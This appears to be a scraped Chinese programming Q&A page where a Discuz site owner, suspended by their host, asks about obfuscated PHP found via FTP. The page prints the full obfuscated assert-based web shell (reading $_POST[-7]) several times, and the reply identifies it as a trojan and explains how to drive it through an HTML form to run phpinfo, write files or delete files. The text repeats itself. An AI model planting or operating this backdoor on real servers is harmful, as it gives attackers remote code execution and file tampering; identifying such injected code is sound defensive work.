discuz 里头有这段代码
程序员文章站
2022-06-15 16:29:40
...
discuz 里面有这段代码
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>
请问这是什么意思?
我的网站被主机屋封了,然后他们叫我删掉游戏登录器,我不太懂,就看了下FTP里面,
有这段代码,不会是黑客注入的吧?
------解决思路----------------------
是木马,利用assert来执行php函数的。
7.php
然后创建一个调用7.php的html文件,摆在任何位置都可以,action那里的7.php改为对应的http路径就可以了。
shell.html
然后运行shell.html,
1.在textarea中输入phpinfo(); 后提交,可以看到phpinfo();的信息
2.如在textarea中输入file_put_contents('abc.php','', true); 后提交,则会在服务器上创建一个abc.php文件。
3.输入unlink('xxxxx'); 后提交,就能删除xxx文件。
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>
请问这是什么意思?
我的网站被主机屋封了,然后他们叫我删掉游戏登录器,我不太懂,就看了下FTP里面,
有这段代码,不会是黑客注入的吧?
------解决思路----------------------
是木马,利用assert来执行php函数的。
7.php
@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";
@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";
@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}
[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>
然后创建一个调用7.php的html文件,摆在任何位置都可以,action那里的7.php改为对应的http路径就可以了。
shell.html
New Document
然后运行shell.html,
1.在textarea中输入phpinfo(); 后提交,可以看到phpinfo();的信息
2.如在textarea中输入file_put_contents('abc.php','', true); 后提交,则会在服务器上创建一个abc.php文件。
3.输入unlink('xxxxx'); 后提交,就能删除xxx文件。
声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn核实处理。
相关文章
相关视频
上一篇: php与redis施用经验分享
下一篇: 查询需要的字符串所在的存储过程及函数